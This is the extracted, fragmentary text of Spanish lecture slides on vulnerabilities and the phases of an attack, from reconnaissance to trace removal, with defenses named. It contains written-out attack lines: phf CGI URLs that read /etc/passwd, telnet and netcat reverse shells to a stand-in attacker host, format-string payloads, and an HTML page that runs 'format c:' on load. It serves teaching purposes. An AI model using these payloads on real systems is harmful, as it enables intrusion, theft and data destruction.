Professional Documents
Culture Documents
Tema 7.
Vunerabilidades y Amenazas
http://www.mlatv.com/2007/10/fotos-camuflaje-en-los-insectos.html
Es sabia la naturaleza?
Virus: 72 %
Spyware: 51 %
Phishing: 31 %
Spam no autorizado: 40 %
Accesos no autorizados: 60 %
DoS: 36 %
Captura de informacin secreta:
19 %
Fraude: 29 %
Robo de identidad: 19 %
Qu pretendemos?
6
Conocer al enemigo
Eleccin de objetivos
Qu proteger
Comprensin de vulnerabilidades
Diseo seguro
Localizacin de vulnerabilidades
Qu est desprotegido
Ejecucin de un ataque
Acceso remoto
Valorar su inters
Valorar sus posibles vulnerabilidades
Anlisis de beneficios y costes
Ser capaz de dar rdenes arbitrarias a la mquina
Acceso como usuario a la mquina
Escalada de privilegios
Fases de un ataque
10
Reconocimiento
Acceso remoto
Escalada de privilegios
Objetivo concreto del ataque
Mantenimiento del acceso
Borrado de huellas
Reconocimiento
11
Reconocimiento
12
Tcnicas de reconocimiento
Footprinting
Obtener
Scanning
Inventario
de puertas y ventanas
Enumeration
Ir
Vulnerability Mapping
Revisar
Footprinting
13
seguridad
Footprinting. Tcnicas
14
Footprinting. Tcnicas
15
nombre_dominio h
whois.ripe.net
Qu se puede obtener?:
Direcciones
postales de entidades
Datos de contacto de administradores de red
Organizacin que asigna determinada direccin IP
Nombres de mquinas concretas (servidores DNS)
Footprinting. Tcnicas
16
Footprinting. Tcnicas
17
Consultas DNS
Footprinting. Tcnicas
18
Traceroute
traceroute it.aut.uah.es
192.168.128.1 6.651ms 12.562ms 49.592 ms
172.29.0.254 12.702ms 1.744ms 50.681 ms
* * * (100% loss)
$ traceroute S p 53 it.aut.uah.es
Scanning
20
Scanning
21
Mecanismos de deteccin
Mecanismos de reaccin
Enumeracin
23
Nombres de usuario
Versin del software del servicio
Sistema operativo de la mquina que ofrece el servicio
El objetivo es encontrar potenciales vulnerabilidades
Banner grabbing
Enumeracin
24
Enumeracin
25
Proteccin de Enumeracin
26
NetBIOS
SNMP
Vulnerability mapping
27
http://www.cert.org
http://www.bugtraq.org
http://www.nessus.org
Fases de un ataque
28
Reconocimiento
Acceso remoto
Escalada de privilegios
Objetivo concreto del ataque
Mantenimiento del acceso
Borrado de huellas
Acceso remoto
29
Qu significa acceso?
Mecanismos de prevencin
Polticas de contraseas
Polticas de bloqueo de cuentas
/cgi-bin/phf?Qalias=x%0a/bin/cat%20/etc/passwd
/cgi-bin/showpage.pl?template=/etc/passwd%00
Perl aade .htm a la cadena /etc/passwd%00.htm
open() corta la cadena en el \0 y muestra el fichero de passwords
Buffer Overflows
34
Stack-based Overflows
35
En la pila se almacena:
Se sobreescribe IP
El programa salta a la nueva
direccin de retorno
Ejecucion arbitraria de cdigo
En general, el cdigo va en
cadena
buffer
cadena
IP
*cadena
Pila (Stack)
Stack-based Overflows
37
Mecanismos de prevencin
Mecanismos de deteccin
Obtencin de shells
39
Passwords dbiles
Relaciones de confianza (fichero .rhosts)
Obtencin de shells
40
Obtencin de shells
41
Obtencin de shells
42
nc p 80
Firewall
Atacante
telnet IP_atacante 80
nc p 25
telnet IP_atacante 25
/bin/sh
Vctima
/bin/telnet IP_atacante 80 | /bin/sh | /bin/telnet IP_atacante 25
Obtencin de shells
43
Obtencin de shells
44
Si el servidor no tiene nc
/cgi-bin/phf?Qalias=x%0arcp+yo@atacante.com:/tmp/nc+ ~/nc
%0a~/nc%20-e%20/bin/sh%20IP_atacante%2080
Obtencin de shells
45
Mecanismos de proteccin
Fases de un ataque
46
Reconocimiento
Acceso remoto
Escalada de privilegios
Objetivo concreto del ataque
Mantenimiento del acceso
Borrado de huellas
Escalada de Privilegios
47
Escalada de Privilegios
48
Hay utilidades que permiten realizar ataques de fuerza bruta contra estos
ficheros
Escalada de Privilegios
49
Ficheros SUID:
Escalada de Privilegios
50
Heap/BSS overflow
Ejemplo de cdigo
int main(int argc, char **argv)
{
FILE *tmpfd;
static char buf[BUFSIZE], *tmpfile;
tmpfile = "/tmp/vulprog.tmp";
printf("Enter one line of data");
gets(buf);
tmpfd = fopen(tmpfile, "w");
fputs(buf, tmpfd);
fclose(tmpfd);
}
int
Condiciones de carrera
55
Condiciones de carrera
56
Ejemplo de ataque
void
//
//
//
//
if (fork() == 0) {
system(programa activedir/lnk"); exit(0); }
usleep(1);
// Cambiar directorios
unlink("activedir");
symlink("dir1", "activedir");
}
%d:
%x:
%s:
%n:
En la pila se almacena:
Llenado de la pila
entero
*cadena
*cadenaF
IP
Pila (Stack)
Memoria
Denegacin de servicio
printf(%s%s%s%s%s%s%s%s%s%s%s%s%s%s);
Volcado de pila
printf(%08x.%08x.%08x.%08x.%08x.%08x.);
Llenado de la pila
*cadena
Pila (Stack)
Memoria
IP
outbuf[512];
char
buffer[512];
printf(\x10\x01\x48\x08_%08x.%08x.%08x.|%s);
\x10\x01\x48\x08_%08x
Pila (Stack)
Llenado de la pila
*cadena
IP
\x10\x01\x48\x08_%08x
Pila (Stack)
Llenado de la pila
*cadena
IP
%08d...%08d\x01\x01\x01\x01\x10\x01\x48\x08...%3u%n
Pila (Stack)
IP
Integer overflows
67
/* [3] */
return -1;
}
memcpy(buf, buf1, len1);
/* [4] */
Integer overflows
68
Otro ejemplo
int copiar(char *buf, int len){
char kbuf [100];
if(len > sizeof(kbuf)){
/* [1] */
return -1;
}
return memcpy(kbuf, buf, len);
}
/* [2] */
Integer overflows
69
Mecanismos de seguridad
70
Mecanismos de prevencin
Mecanismos de deteccin
Reconocimiento
Acceso remoto
Escalada de privilegios
Objetivo concreto del ataque
Mantenimiento del acceso
Borrado de huellas
Troyanos
Rootkits
Kernel Rootkits
Limpieza de logs
Borrado de huellas
Localizacin de logs
cat /etc/syslog.conf
Normalmente en /var/log
~/.bash_history
Mecanismos de seguridad
Snort (http://www.snort.org)
LIDS Linux Intrusion Detection System
(http://www.lids.org)
Mucho ms numeroso
En general, ms sencillo
Suplantacin de identidad
Ejecucin de cdigo malicioso
Robo de informacin
Suplantacin de identidad
78
Phishing
Suplantacin de identidad
79
<html>
<head>
<script language="JavaScript">
function spawn2()
{
o2obj.LaunchApp("c:\\windows\\system32\\cmd.exe","/C format c:,0);
}
</script>
</head>
<body onload="spawn2()">
<object ID="o2obj" WIDTH=0 HEIGHT=0
classid="clsid:62DDEB79-15B2-41E3-8834-D3B80493887A"
</object>
</body>
</html>
Mecanismos de seguridad
Botnets
84
Robo de informacin
Ataques de denegacin de servicio
Envo de spam
Botnets
85
Routers, DNSs
Conclusiones
88
Internet no es segura
Referencias
89
http://www.cert.org
http://www.bugtraq.org